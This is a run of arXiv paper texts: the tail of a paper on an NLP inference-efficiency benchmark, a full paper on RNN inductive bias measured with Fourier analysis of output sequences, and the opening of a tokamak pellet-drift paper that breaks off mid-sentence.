**WMT19-Meta**, this model is multilingual and trained on data from all languages for the WMT 2021 shared task. Training data is a mixture of parallel corpora, monolingual corpora and mined bitext. This multilingual system ranked high in several WMT21 news translation tasks (Akhbardeh et al., 2021). We refer to Tran et al. (2021) for complete details. We evaluate using PyTorch with both full precision (FP32) and half precision (FP16), to study the effect of quantization. In our preliminary experiments, we found that employing more aggressive quantization techniques such as 8-bit and 4-bit quantization using naive methods led to severely compromised translation quality, with the BLEU score dropping to around 1, effectively resulting in a failed translation. All models' implementation and checkpoints are available on Hugging Face. **Results.** Figure 2 summarizes the efficiency performance of different models on the WMT14 DE-EN dataset, along with their translation quality. Overall, models trained for English translation demonstrated better trade-offs between translation quality and efficiency. Notably, OPUS outperforms the much larger MBART M2M and M2M100 models in both accuracy and all aspects of efficiency, and is the most efficient model among all. Although WMT21-Meta, the largest model considered, provides the highest BLEU score, it takes a substantial hit in efficiency. Interestingly, despite being more than four times larger, WMT19-Meta achieves efficiency performance comparable to OPUS in latency, memory overhead, and energy consumption, and significantly outperforms it in terms of BLEU. However, it falls short of OPUS in throughput. 
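As an aside on the setup above: all of the FP32 and FP16 runs use standard Hugging Face checkpoints, and the half-precision configuration can be reproduced roughly as in the sketch below. The OPUS checkpoint name is an illustrative assumption, and the generation settings shown are not taken from the paper.

```python
import torch
from transformers import AutoModelForSeq2SeqLM, AutoTokenizer

# Assumed checkpoint identifier for the OPUS DE->EN model; substitute whichever
# checkpoint is actually being benchmarked.
model_name = "Helsinki-NLP/opus-mt-de-en"

tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForSeq2SeqLM.from_pretrained(
    model_name,
    torch_dtype=torch.float16,  # FP16 weights; use torch.float32 for the FP32 runs
).to("cuda").eval()             # assumes a CUDA device is available

sentences = ["Das ist ein Test.", "Guten Morgen!"]
batch = tokenizer(sentences, return_tensors="pt", padding=True).to("cuda")
with torch.inference_mode():
    generated = model.generate(**batch, max_new_tokens=128)
print(tokenizer.batch_decode(generated, skip_special_tokens=True))
```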
These observations confirm that relying on a single efficiency metric risks oversimplifying the complex efficiency landscape of practical applications. With ONNX, the models achieve over 20% improvements in latency and throughput in the single-stream scenario, accompanied by a significant reduction in memory and energy overhead. However, smaller efficiency improvements are observed in the other scenarios, which use larger batch sizes. **Larger models benefit more from FP16 quantization.** By comparing Figures 1(a) and 1(b), we observe that FP16 quantization improves all models' efficiency performance (except #Params.), particularly memory overhead. Larger models appear to benefit more from quantization. As shown in Figures 1(c) and 1(d), while OPUS experiences minimal efficiency gains from quantization apart from increased throughput, WMT21-Meta's efficiency dramatically improves with FP16 quantization, nearly doubling throughput and reducing latency, memory overhead, and energy consumption by half or more. These results highlight the promise of advancing quantization techniques for larger models in order to improve the trade-off between accuracy and efficiency. **In single-GPU inference, the GPU accounts for only a minor portion of the energy consumption.** This is demonstrated by Figure 3. This experiment uses a single RTX8000 GPU with a maximum power of 260W. We note that the GPU rarely operates at full power, implying that GPU hours, a metric commonly used to gauge training computational overhead (Henderson et al., 2020; Kasai et al., 2021), is unsuitable for estimating inference GPU energy. Even during the most GPU-intensive runs by the WMT21-Meta model, where it does operate at full capacity, the GPU only accounts for one third of the total machine power. This observation diverges from previous findings on _training_, where GPUs are estimated to constitute around 70% of the energy usage (Dodge et al., 2022). We attribute the difference to the increased memory and disk IO demands during inference, coupled with lower GPU utilization and increased idling time due to smaller compute kernels. This disparity suggests that efficiency conclusions drawn from training need careful examination when applied to inference. Interestingly, we observe a correlation between higher GPU power and higher power utilization by other components. We conjecture that this is at least partially due to the increased fan activity needed for cooling. Figure 3: Power consumption in Watts across different model inference runs in the single stream (3a) and offline (3b) scenarios. Purple bars indicate the power consumed by the GPU, while the light blue bars represent the power consumption of all other system components, excluding the GPU. The white numbers denote the absolute power consumption values in Watts, while the percentage numbers atop the bars provide the proportion of power consumption that is accounted for by the GPU. Figure 2: Performance of various models on the WMT14 DE-EN dataset, represented in terms of BLEU scores and a range of efficiency metrics. To more accurately reflect real-world applications, the figures include throughput metrics from the offline scenario, latency and GPU memory metrics from the single stream scenario, and energy metrics from the fixed batching scenario. For all metrics, **outer rings indicate better performance**. #Params is presented on a logarithmic scale. ## 4 Related Work There is growing interest in incorporating efficiency into NLP benchmarks. Dynabench Kiela et al. 
(2021) and Dynaboard Ma et al. (2021) concentrate on dynamic dataset creation and model assessment, incorporating efficiency metrics such as throughput and memory, alongside fairness and robustness. HELM Liang et al. (2022) evaluates language models with seven metrics, including efficiency. Though training efficiency in HELM covers energy, carbon, and wallclock time, the inference efficiency in this benchmark only measures inference runtime, and the energy and carbon footprint are only roughly estimated. HULK Zhou et al. (2021) evaluates energy efficiency as a proxy for time and cost, while Pentathlon evaluates multiple different efficiency metrics in a realistic way. Long-Range Arena Tay et al. (2021) builds a set of synthesized tasks to evaluate the long-range capabilities of NLP models in terms of generalization and computational efficiency, including speed and memory footprint. Another line of work has studied application- or task-specific efficiency, such as trade-offs between accuracy and energy consumption for long-context NLP models Ang et al. (2022), inference energy competition for models on SuperGLUE Wang and Wolf (2020), or storage efficiency for open-domain question answering Min et al. (2021). Most related to Pentathlon, MLPerf targets inference efficiency across various real-world scenarios Reddi et al. (2020); Banbury et al. (2020). While MLPerf aims to stimulate building more efficient hardware platforms, Pentathlon incentivizes algorithmic innovations while keeping the hardware fixed. Hosted on an in-house machine, Pentathlon can accurately measure inference energy consumption, which was not possible in previous benchmark efforts. ## 5 Conclusions We present Pentathlon, a benchmark for holistic and realistic evaluation of inference efficiency. Pentathlon targets multiple aspects of efficiency, including latency, throughput, memory overhead, number of parameters, and energy consumption, on a strictly-controlled hardware platform. Integrating evaluation with Pentathlon is seamless and can drastically reduce the workload required to make fair and reproducible efficiency comparisons. Pentathlon offers both testing in real-world application scenarios and a standardized platform for comparison between any two submissions. We establish this tool for NLP models but offer flexible extensions to additional tasks and scenarios. We envision that Pentathlon will provide a new lens on testing algorithmic innovations by lowering the barrier to entry for evaluating efficiency and characterizing the environmental impact of future models.
2305.09178
Empirical Analysis of the Inductive Bias of Recurrent Neural Networks by Discrete Fourier Transform of Output Sequences
A unique feature of Recurrent Neural Networks (RNNs) is that it incrementally processes input sequences. In this research, we aim to uncover the inherent generalization properties, i.e., inductive bias, of RNNs with respect to how frequently RNNs switch the outputs through time steps in the sequence classification task, which we call output sequence frequency. Previous work analyzed inductive bias by training models with a few synthetic data and comparing the model's generalization with candidate generalization patterns. However, when examining the output sequence frequency, previous methods cannot be directly applied since enumerating candidate patterns is computationally difficult for longer sequences. To this end, we propose to directly calculate the output sequence frequency for each model by regarding the outputs of the model as discrete-time signals and applying frequency domain analysis. Experimental results showed that Long Short-Term Memory (LSTM) and Gated Recurrent Unit (GRU) have an inductive bias towards lower-frequency patterns, while Elman RNN tends to learn patterns in which the output changes at high frequencies. We also found that the inductive bias of LSTM and GRU varies with the number of layers and the size of hidden layers.
Taiga Ishii, Ryo Ueda, Yusuke Miyao
2023-05-16T05:30:13Z
http://arxiv.org/abs/2305.09178v1
# Empirical Analysis of the Inductive Bias of Recurrent Neural Networks by Discrete Fourier Transform of Output Sequences ###### Abstract A unique feature of Recurrent Neural Networks (RNNs) is that they incrementally process input sequences. In this research, we aim to uncover the inherent generalization properties, i.e., inductive bias, of RNNs with respect to how frequently RNNs switch the outputs through time steps in the sequence classification task, which we call output sequence frequency. Previous work analyzed inductive bias by training models with a few synthetic data and comparing the model's generalization with candidate generalization patterns. However, when examining the output sequence frequency, previous methods cannot be directly applied since enumerating candidate patterns is computationally difficult for longer sequences. To this end, we propose to directly calculate the output sequence frequency for each model by regarding the outputs of the model as discrete-time signals and applying frequency domain analysis. Experimental results showed that Long Short-Term Memory (LSTM) and Gated Recurrent Unit (GRU) have an inductive bias towards lower-frequency patterns, while Elman RNN tends to learn patterns in which the output changes at high frequencies. We also found that the inductive bias of LSTM and GRU varies with the number of layers and the size of hidden layers. ## 1 Introduction In this research, we aim to uncover the inherent generalization properties, i.e., inductive bias, of RNNs with respect to how frequently RNNs switch the outputs through time steps in the sequence classification task, which we call _output sequence frequency_ (Figure 1). In supervised learning settings, a model is trained with finite input-output examples \(\{(x_{0},\,y_{0}),\dots,(x_{n},\,y_{n})\}\) and then tested with unseen input-output pairs. The models that achieve high accuracy on test data are often said to "generalize well". However, the important point is that a function \(f\) satisfying \(f(x_{i})=y_{i}\) cannot be uniquely determined from finite train examples. This entails that if a model generalizes well to a certain function \(f\), then the model hardly generalizes to another function \(f^{\prime}\) that has different outputs for the same unseen inputs, i.e., \(f(x_{\mathrm{test}})\neq f^{\prime}(x_{\mathrm{test}})\), but is consistent with the same train examples; \(f^{\prime}(x_{i})=y_{i}\). Therefore, it is crucial to understand what kind of functions a model inherently prefers to learn, which is referred to as **inductive bias** (White and Cotterell, 2021; Kharitonov and Chaabouni, 2020; Deletang et al., 2022; Lovering et al., 2020). Our target is the Recurrent Neural Network (RNN), a well-known deep learning architecture. A key feature of an RNN is that it processes the input incrementally and predicts the output at each time step, producing a sequence of outputs. This is different from other deep learning architectures, e.g., Feed Forward Network (FFN), Convolutional Neural Network (CNN), and Transformers (Vaswani et al., 2017). Figure 1: An example showing a train dataset and two candidate generalization patterns, each showing a different output sequence frequency. Here, "aababba" is the input sequence, and there are four binary train labels \(0,1,1,0\), each corresponding to the prefixes of length \(2,3,5,6\). 
Due to the incremental processing feature of RNNs, the inputs can be of variable length; RNNs have been used for various tasks in natural language processing, such as sentence classification and text generation. It has also been used as a subcomponent of more complex architectures (Dyer et al., 2016) and to simulate human sequential processing (Steinert-Threlkeld and Szymanik, 2019). Variants of RNN architectures have been proposed so far. The most basic one is the Elman RNN (Elman, 1990). Later, more complex architectures, such as LSTM (Hochreiter and Schmidhuber, 1997) and GRU (Cho et al., 2014), have been proposed to improve modeling long-term dependencies. Although deep learning models, including RNNs, are said to be high-performance models, they are essentially black boxes, and it is not clear what inductive bias they may have. In this research, in order to analyze the inductive bias of RNNs, we propose to calculate the output sequence frequency by regarding the outputs of RNNs as discrete-time signals and applying frequency domain analysis. Specifically, we apply discrete Fourier transform (DFT) to the output signals and compute the dominant frequencies to grasp the overall output patterns. Inductive bias is not straightforward to analyze since it can be affected by various factors such as the task, dataset, and training method; theoretical analysis has been limited to simple architecture such as FFN (Rahaman et al., 2019; Valle-Perez et al., 2019). Therefore, empirical studies have been conducted to clarify the inductive bias in various tasks and settings, such as language modeling (White and Cotterell, 2021), sequence classification (Lovering et al., 2020), and sequence-to-sequence (Kharitonov and Chaabouni, 2020). These works approached the problems by designing synthetic datasets and testing several generalization patterns. However, when examining the output sequence frequency, we cannot directly apply these previous methods since enumerating exponentially many output sequence patterns in longer sequences is computationally difficult. To this end, our method makes use of frequency domain analysis to directly calculate the output sequence frequencies and avoid enumerating the candidate generalization patterns. In the experiment, we randomly generated \(500\) synthetic datasets and trained models on a few data points (Figure 1). As a result, we found: * LSTM and GRU have an inductive bias such that the output changes at lower frequencies compared to Elman RNN, which can easily learn higher frequency patterns, * The inductive bias of LSTM and GRU varies with the number of layers and the size of hidden layers. ## 2 Background ### Inductive Bias Analysis Inductive bias analysis is usually performed by constructing synthetic datasets. This is because data from real tasks are complex and intertwined with various factors, making it difficult to determine what properties of the dataset affect the behavior of the model. For example, White and Cotterell (2021) targeted LSTM and Transformer and investigated whether easy-to-learn languages differ depending on their typological features in language modeling. White and Cotterell (2021) used Context Free Grammar (CFG) to construct parallel synthetic language corpora with controlled typological features. They trained models on each language and computed their perplexities to find that LSTM performs well regardless of word order while the transformer is affected. Another more synthetic example is Kharitonov and Chaabouni (2020). 
Kharitonov and Chaabouni (2020) targeted LSTM, CNN, and Transformer. They designed four synthetic tasks in the sequence-to-sequence framework and trained models on very small datasets (containing 1\(\sim\)4 data points). To examine the inductive biases of the models, they prepared a pair of candidate generalization patterns, such as COUNT and MEMORIZATION, for each task and compared the models' preference over the candidate patterns by calculating the Minimum Description Length (Rissanen, 1978). Using extremely small train datasets makes it possible to restrict the information models can obtain during training and analyze the models' inherent inductive bias in a more controlled setup. In this research, we take a similar approach as (Kharitonov and Chaabouni, 2020), restricting the train data to extremely small numbers. However, we cannot directly apply the methods of Kharitonov and Chaabouni (2020) because the approach of comparing with candidate generalization patterns can be impractical in our case. Specifically, when examining the output sequence frequency, it is necessary to feed the models with longer se quences in order to analyze a wide range of frequencies from low to high; there are exponentially many patterns with the same number of output changes in longer sequences, which makes it difficult to exhaustively enumerate the candidate generalization patterns. Therefore, instead of preparing candidate generalization patterns, we directly calculate the output sequence frequency for each model by regarding the outputs of the model as discrete-time signals and applying frequency domain analysis. ### Frequency Domain Analysis Discrete Fourier Transform (DFT) is a fundamental analysis technique in digital signal processing. Intuitively, DFT decomposes a signal into a sum of finite sine waves of different frequencies, allowing one to analyze what frequency components the original signal consists of. The DFT for a length \(N\) discrete-time signal \(f[0],\ldots,f[N-1]\) is defined by the following equation: \[F[k]\;=\;\sum_{n=0}^{N-1}f[n]\exp\left(-\sqrt{-1}\frac{2\pi}{N}kn\right). \tag{1}\] When \(f[n]\) is a real-value signal, it is sufficient to consider only \(k\in\{1,\ldots,\frac{N}{2}\}\).1 Here, \(k=1\) corresponds to the lowest frequency component and \(k=\frac{N}{2}\) to the highest. Footnote 1: This is due to the periodicity of \(\exp(-\sqrt{-1}\frac{2\pi}{N}kn)\). Furthermore, we do not take into account the \(k=0\) term since it is called a DC term and works as an offset. One useful measure for analyzing the property of the signal \(f[n]\) is the dominant frequency (Ng and Goldberger, 2007). In short, dominant frequency is the frequency component of maximum amplitude and is expected to represent the general periodic pattern of the original signal \(f[n]\). The dominant frequency \(\omega_{\mathrm{dom}}\;=\;\frac{2\pi}{N}k_{max}\), where \(k_{max}\;=\;\arg\max\{|F[k]|\}\). ## 3 Methods ### Task To analyze the output sequence frequency, i.e., how frequently the output changes through time steps, we focus on a simple case of binary sequence classification task: the inputs are the prefixes of a binary sequence \(s\in\{\mathrm{a},\mathrm{b}\}^{*}\). 
Specifically, given a binary sequence \(s\in\{\mathrm{a},\mathrm{b}\}^{*}\), the input space \(\mathcal{I}\) and the output space \(\mathcal{O}\) are defined as follows: \[\mathcal{I} \;=\;\{s_{0:i}\:|\:i=0,\ldots|s|-1\}, \tag{2}\] \[\mathcal{O} \;=\;\{(1-p,p)\:|\:p\in[0,1]\}, \tag{3}\] where \(\mathcal{O}\) is a set of categorical distributions over the binary labels \(\{0,1\}\), and \(p\) denotes the probability of predicting label \(1\). Without loss of generality, we need only consider the model's output probability of predicting label \(1\) for the sequence \(s_{0:i}\), which we denote by \(\mathcal{M}(s_{0:i})\). In this way, we can regard the model's output sequence \(\mathcal{M}(s_{0:0}),\ldots,\mathcal{M}(s_{0:|s|-1})\) as a discrete-time signal taking values in \([0,1]\). ### Train Dataset Figure 2 shows an intuitive illustration of our dataset construction. Given a sequence \(s\), we randomly generate the binary labels \(y_{0:|s|-1}\), where each \(y_{i}\) is the label assigned to the prefix \(s_{0:i}\). When two successive labels \(y_{i}\) and \(y_{i+1}\) differ, we say there is a _label change_ (e.g., \(y_{9}\) and \(y_{10}\) in Figure 2).2 We then make a train dataset \(\mathcal{D}\) by taking instances where the labels change: \(\{(s_{0:i},y_{i}),(s_{0:i+1},y_{i+1})\:|\:y_{i}\neq y_{i+1}\}\). For example, in Figure 2, the train data \(\mathcal{D}\) contains \(\{(\mathrm{aa},0)\:(\mathrm{aab},1)\:(\mathrm{aababba},1)\:(\mathrm{aababba},0),\ldots\}\). Note that the original labels \(y_{0:|s|-1}\) can be uniquely recovered from \(\mathcal{D}\) simply by _interpolating_ or _extending_ the labels for other prefixes. Footnote 2: Similarly, we use _output change_ for output sequences. Figure 2: Illustration of train dataset construction. The train dataset contains only the instances corresponding to the label changes. The procedure is formalized as follows: 1. Sample a sequence \(s\in\{\mathrm{a},\mathrm{b}\}^{N}\), where \(N\) is the length of the sequence, 2. Sample the number of label changes \(m\in\{1,\ldots,M\}\), where \(M\) is the maximum number of label changes, 3. Sample the labels \(y_{0:|s|-1}\) so that all the \(m\) label changes do not overlap3, i.e. \(\forall i,j.\ i<j\wedge y_{i}\neq y_{i+1}\wedge y_{j}\neq y_{j+1}\Rightarrow i+1<j\), Footnote 3: This condition ensures that the labels in the train dataset are balanced. 4. Create a dataset as \[\mathcal{D}\ =\ \{(s_{0:i},y_{i}),(s_{0:i+1},y_{i+1})\,|\,y_{i}\neq y_{i+1}\}.\] By training models on random input sequences \(s\), we expect the model predictions to represent the inherent generalization property of the model. ### Evaluation Metrics For the analysis, we apply two evaluation metrics. #### 3.3.1 Test Cross-entropy Loss First, we compare the model's output sequence \(\mathcal{M}(s_{0:0}),\ldots,\mathcal{M}(s_{0:|s|-1})\) with the original labels \(y_{0:|s|-1}\) by calculating the test cross-entropy loss \(\mathcal{L}_{\mathrm{CE}}\). Intuitively, a near-zero \(\mathcal{L}_{\mathrm{CE}}\) indicates that the model generalizes to simply _interpolate_ or _extend_ the training labels, since we constructed the train datasets so that the original labels can be recovered by interpolation, as described in section 3.2. The loss is formalized as: \[\mathcal{L}_{\mathrm{CE}}\ =\ -\frac{1}{|\mathcal{T}|}\sum_{i\in\mathcal{T}}\left(y_{i}\ln(\mathcal{M}(s_{0:i}))+(1-y_{i})\ln(1-\mathcal{M}(s_{0:i}))\right), \tag{4}\] where \(\mathcal{T}=\{i\,|\,(s_{0:i},\_)\notin\mathcal{D}\}\) is the set of test data indices. 
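To make the construction and the metrics concrete, the following is a small sketch in plain Python/NumPy. It is our own paraphrase of steps 1-4, Equation 4, and the dominant-frequency definition from Section 2.2, not the authors' code, and the helper names are illustrative.

```python
import math
import random
import numpy as np

def make_dataset(N=100, M=5, seed=0):
    """Steps 1-4 of Section 3.2: sample a sequence, place non-overlapping label
    changes, and keep only the label-changing prefixes as train data."""
    rng = random.Random(seed)
    s = "".join(rng.choice("ab") for _ in range(N))        # step 1
    m = rng.randint(1, M)                                   # step 2
    while True:                                              # step 3: reject adjacent changes
        changes = sorted(rng.sample(range(N - 1), m))
        if all(b - a > 1 for a, b in zip(changes, changes[1:])):
            break
    labels, current = [], rng.randint(0, 1)
    for i in range(N):
        labels.append(current)
        if i in changes:
            current = 1 - current                            # ensures y_i != y_{i+1}
    train_idx = {i for c in changes for i in (c, c + 1)}     # step 4: indices kept in D
    return s, labels, train_idx

def test_cross_entropy(preds, labels, train_idx, eps=1e-12):
    """Equation 4: average cross-entropy over prefixes not in the train set."""
    test = [i for i in range(len(labels)) if i not in train_idx]
    return -sum(labels[i] * math.log(preds[i] + eps)
                + (1 - labels[i]) * math.log(1 - preds[i] + eps)
                for i in test) / len(test)

def dominant_frequency(outputs):
    """Equation 1 plus the Section 2.2 definition: the frequency bin of maximum
    amplitude, ignoring the DC term, for the real-valued output signal."""
    spectrum = np.abs(np.fft.rfft(np.asarray(outputs, dtype=float)))
    spectrum[0] = 0.0                                        # drop the DC (offset) term
    return 2 * math.pi * int(np.argmax(spectrum)) / len(outputs)
```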
#### 3.3.2 Dominant Frequency In case \(\mathcal{L}_{\mathrm{CE}}\) is high, we consider the model's output sequence \(\mathcal{M}(s_{0:0}),\ldots,\mathcal{M}(s_{0:|s|-1})\) as a discrete-time signal and apply frequency domain analysis to look into the model's behavior. More specifically, we apply DFT to the output signal and obtain the dominant frequency \(\omega_{\mathrm{dom}}\). The dominant frequency \(\omega_{\mathrm{dom}}\) is calculated by simply replacing \(f[n]\) in Equation 1 with \(\mathcal{M}(s_{0:n})\). ### Experiment Settings Here, we describe the basic settings of our experiment. We use well-known basic RNN architectures: LSTM (Hochreiter and Schmidhuber, 1997), GRU (Cho et al., 2014), and Elman RNN (Elman, 1990). For the decoding, we use a linear decoder without bias followed by a softmax function. We try 4 combinations of hyperparameters: \((\textit{num\_layers},\ hidden\_size)\in\{(1,200),\ (2,200),\ (3,200),\ (2,2000)\}\), where \(\textit{num\_layers}\) denotes the number of layers, and \(\textit{hidden\_size}\) denotes the size of hidden layers.4 Footnote 4: For other hyperparameters and parameter initialization, we used the default settings of PyTorch [https://pytorch.org/](https://pytorch.org/). For optimization, we train models to minimize the average cross-entropy loss by gradient descent using Adam (Kingma and Ba, 2015) with a learning rate of \(1.0\times 10^{-4}\) for \(1000\) epochs.5 Footnote 5: Since the maximum size of train data is 10 in our settings, all the data are put in a batch during the training. Finally, we randomly generate \(500\) train datasets with \(N\,=\,100,M\,=\,5\) and train \(10\) models with different random seeds for each dataset, architecture, and parameter setting. Note that this sparse setting (\(10:90\) train-test data ratio at maximum) keeps the hypothesis space large and thus enables us to analyze the inductive bias of the models as described in section 2.1. Training all the models took around 30 hours using 8 NVIDIA A100 GPUs. ## 4 Findings ### Models Do Not Learn to Interpolate In order to see if the models generalize simply to interpolate the given labels, we calculate the median test cross-entropy loss of the multiple models trained for each dataset (Figure 3). The dotted vertical line shows the random baseline loss of \(-\ln(\frac{1}{2})\approx 0.7\). Figure 3: The median test cross-entropy loss counts for LSTM, GRU, and Elman RNN with \((\textit{num\_layers},\ hidden\_size)=(2,200)\). The dotted vertical line shows the random baseline loss of \(-\ln(\frac{1}{2})\). As can be seen in Figure 3, the median test cross-entropy loss is higher than the random baseline for most datasets for all of LSTM, GRU, and Elman RNN. This indicates that, in most cases, none of the LSTM, GRU, or Elman RNN learns to interpolate in this extremely simple setup, where only the label-changing part is given as training data. We also observe a similar trend in other hyperparameter settings; the test cross-entropy losses for other settings are shown in Appendix A. ### Architectural Difference Now that the test cross-entropy loss has revealed that the patterns learned by the models contain more output changes than the original pattern in the train data, the next step is to see if there are any architecture-specific trends in the output sequence patterns. We calculate the dominant frequency for each model and take the median over the models trained on the same dataset. Figure 4 shows the distribution of median dominant frequencies for LSTM, GRU, and Elman RNN with different hyperparameters. 
It is clear that, in all settings, LSTM and GRU tend to learn lower-frequency patterns, while the dominant frequencies of Elman RNN tend to be higher. Comparing LSTM and GRU, LSTM has slightly lower-frequency patterns for \(hidden\_size=200\) (Figure 4 (a, b, c)), though the difference is not as clear for \(hidden\_size=2000\) (Figure 4 (d)). An example of sequential outputs of LSTM and Elman is shown in Figure 5. The top rows show the actual model outputs for a specific sequence, and the bottom rows show the DFT of model outputs. In this example, only 4 labels \(0,1,1,0\) are given to the prefixes of length \(60,61,84,85\). It is clear that both LSTM and Elman learn periodic patterns but do not learn to interpolate the given train labels. Besides, it is also notable that LSTMs indeed learn lower Figure 4: The median dominant frequency counts for LSTM, GRU, and Elman RNN with different hyperparameters. frequency patterns compared to Elman RNNs. ### Effect of Hyperparameters Here, we describe how hyperparameters affect the observed inductive biases. #### 4.3.1 Number of Layers Figure 6 shows the median dominant frequencies of \(num\_layers=1,2,3\) for LSTM, GRU, and Elman RNN. As for LSTM, it can be seen that the proportion of patterns in the lower-frequency domain tends to increase as the number of layers increases. In other words, despite the increased complexity of the models, LSTMs tend to learn simpler patterns (in the sense that the output changes less). A similar trend is observed for GRU, although not as clear as for LSTM. On the other hand, Elman RNN does not show such apparent differences. #### 4.3.2 Hidden Layer Size Figure 7 shows the median dominant frequencies of \(hidden\_size=200,2000\) for LSTM, GRU, and Elman RNN. Although the trend is not so clear, for LSTM and GRU, the counts are slightly larger for \(\omega_{\mathrm{dom}}=0.5\sim 1.0\) when \(hidden\_size=2000\), while the counts are larger for \(\omega_{\mathrm{dom}}=0.0\sim 0.5\) when \(hidden\_size=200\). This is rather the opposite trend from that of \(num\_layers\). However, the above trend does not seem to appear in Elman RNN. ## 5 Discussion and Limitation ### Expressive Capacity and Output Sequence Frequency Our results do not align with the expressive capacity of RNNs reported in previous work (Merrill et al., 2020; Weiss et al., 2018). Merrill et al. (2020); Weiss et al. (2018) formally showed that LSTM is strictly more expressive than GRU and Elman RNN. On the other hand, in our experiments, LSTM and GRU show a bias toward lower frequencies, while Elman RNN, which has the same expressive capacity as GRU, according to (Merrill et al., 2020), shows an opposite bias toward higher frequencies. Note that the expressive capacity and the inductive bias of a model are basically different concepts. This is because expressive capacity is the theoretical upper bound on the functions a model can represent with all possible combinations of its parameters, regardless of the training procedure. In contrast, inductive bias is the preference of functions that a model learns from finite train data, possibly depending on training settings. However, they are not entirely unrelated because a function that is impossible to learn in terms of expressive capacity will never be learned, which can emerge as inductive bias. We conjecture that the difference Figure 5: An example of LSTM and Elman RNN with \((num\_layers,\ hidden\_size)=(2,200)\). 
The top rows show the actual model outputs for a specific sequence, and the bottom rows show the DFT of model outputs. In this example, 4 labels \(0,1,1,0\) are assigned to the prefixes of length \(60,61,84,85\). The Red and blue vertical lines correspond to the labels \(0,1\), respectively. The results of 10 models with different random seeds are shown. Figure 6: The median dominant frequencies of \(num\_layers=1,2,3\) for LSTM, GRU, and Elman RNN with \(hidden\_size=200\). between the expressive capacity and the observed inductive bias is due to the simplicity of our experiment setting. This difference is not a negative result: It indicates that inductive bias in such a simple setting is effective in observing detailed differences that cannot be captured by expressive capacity. ### Randomness of Outputs Previous study showed that FFNs hardly learn random functions since they are inherently biased toward simple structured functions Valle-Perez et al. (2019). We can find a similar trend for RNNs in our experimental results. In other words, by regarding the outputs of RNNs as discrete-time signals, we can confirm that the signals are not random, i.e., white noises. If we assume that the output signals of the RNNs are random, the dominant frequency should be uniformly distributed from low to high-frequency regions. Therefore, the biased distribution in Figure 4 indicates that the outputs of the RNNs are not random signals. This is also clear from the example outputs in Figure 5, where the models show periodic patterns. ### Practical Implication For LSTM and GRU, we observed different inductive biases between increasing the number of layers and hidden layer size. Previous study that investigated whether RNNs can learn parenthesis also reported that LSTM and GRU behaved differently when the number of layers and the hidden layer size were increased Bernardy (2018). Although the tasks are different, our findings align with the previous work. From a practical point of view, these findings suggest that it may be more effective to increase the number of layers than to increase the hidden layer size depending on the target task. Besides, the fact that LSTM and GRU, which are known to be "more practical" than Elman RNN, tend to learn lower frequency patterns may support the idea that output sequence frequency aligns with "practical usefulness." Furthermore, a concept similar to output sequence frequency has been proposed as a complexity measure in sequence classification: sensitivity Hahn et al. (2021). While output sequence frequency focuses on the change in output over string length, sensitivity focuses on the change in output when a string is partially replaced, keeping its length. It would be an interesting future direction to examine the validity of inductive biases in output sequence frequency as an indicator of complexity and practical usefulness. ### Limitation There are some dissimilarities between our experimental setup and practical sequence classification tasks: * The task is limited to the binary classification of binary sequences, * Models are trained only on prefixes of a sequence, * The number of train data is extremely small. Therefore, in order to accurately estimate the impact of our findings on the actual task, it is necessary to expand from sequence to language in a multi-label setting with a larger vocabulary. Due to the computational complexity, we only tried 4 combinations of hyperparameters. 
However, a more exhaustive sweep of hyperparameter combinations is still needed for a more detailed analysis. ## 6 Conclusion This study focuses on the inductive bias of RNNs regarding output sequence frequency, i.e., how often RNNs tend to change their outputs through time steps. To this end, we constructed synthetic datasets and applied frequency domain analysis by regarding the model outputs as discrete-time signals. Experimental results showed that LSTM and GRU have inductive biases towards low output sequence frequencies, whereas Elman RNN tends to learn higher-frequency patterns. Such differences in inductive bias could not be captured by the expressive capacity of each architecture alone. This indicates that inductive bias analysis on synthetic datasets is an effective method for studying model behaviors. By testing different hyperparameters, we found that the inductive biases of LSTM and GRU vary with the number of layers and the hidden layer size in different ways. This suggests that when increasing the total number of parameters of a model, it can be effective not only to enlarge the hidden layers but also to vary other hyperparameters, such as the number of layers. Although the experimental setting was limited to simple cases, we believe this research sheds some light on the inherent generalization properties of RNNs and builds a basis for architecture selection and design.
2301.12911
Drift of ablated material after pellet injection in a tokamak
Pellet injection is used for fuelling and controlling discharges in tokamaks, and it is foreseen in ITER. During pellet injection, a movement of the ablated material towards the low-field side (or outward major radius direction) occurs because of the inhomogeneity of the magnetic field. Due to the complexity of the theoretical models, computer codes developed to simulate the cross-field drift are computationally expensive. Here, we present a one-dimensional semi-analytical model for the radial displacement of ablated material after pellet injection, taking into account both the Alfv\'en and ohmic currents which short-circuit the charge separation creating the drift. The model is suitable for rapid calculation of the radial drift displacement, and can be useful for e.g. modelling of disruption mitigation via pellet injection.
O. Vallhagen, I. Pusztai, P. Helander, S. L. Newton, T. Fülöp
2023-01-30T14:13:22Z
http://arxiv.org/abs/2301.12911v2
# Drift of ablated material after pellet injection in a tokamak ###### Abstract Pellet injection is used for fuelling and controlling discharges in tokamaks, and it is foreseen in ITER. During pellet injection, a movement of the ablated material towards the low-field side (or outward major radius direction) occurs because of the inhomogeneity of the magnetic field. Due to the complexity of the theoretical models, computer codes developed to simulate the cross-field drift are computationally expensive. Here, we present a one-dimensional semi-analytical model for the radial displacement of ablated material after pellet injection, taking into account both the Alfven and ohmic currents which short-circuit the charge separation creating the drift. The model is suitable for rapid calculation of the radial drift displacement, and can be useful for e.g. modelling of disruption mitigation via pellet injection. ## 1 Introduction Pellet injection is an effective tool for modifying the density profile in fusion devices, and can be used for both fuelling and plasma control (Pegourie, 2007). It has also been employed successfully to mitigate transient events in tokamaks, e.g. edge localized modes (Lang _et al._, 2015) and disruptions (Revx _et al._, 2021). The use of pellets to control such events is also planned for ITER (Baylor _et al._, 2009; Hollmann _et al._, 2015; Lehnen _et al._, 2018). In order to assess the performance of pellet injection schemes for future tokamaks, such as ITER, it is important that accurate estimates of the modified density profile created by the pellets are included in the modelling tools used to simulate such events. This can only be achieved through an understanding of the underlying physics of the mass deposition after pellet injection. When a pellet is injected into a hot, magnetically confined plasma, it travels through the plasma in solid form while the outer layers are continuously ablated by the energy flux from the hot background plasma, resulting in material being deposited along the pellet trajectory. The cloud of ablated material initially has a cold dense structure - a plasmoid - which drifts towards the low-field side of the torus. This is caused by the charge separation that takes place due to electron and ion drifts in the inhomogeneous magnetic field, leading to the build-up of a vertical electric field, and the resulting \(\mathbf{E}\times\mathbf{B}\)-drift moves the ablated material across magnetic field lines (Parks _et al._, 2000; Rozhansky _et al._, 2004; Pegourie _et al._, 2006). The strength of the electric field, and hence the drift velocity, is determined by the mechanisms which can short-circuit the charge separation inside the 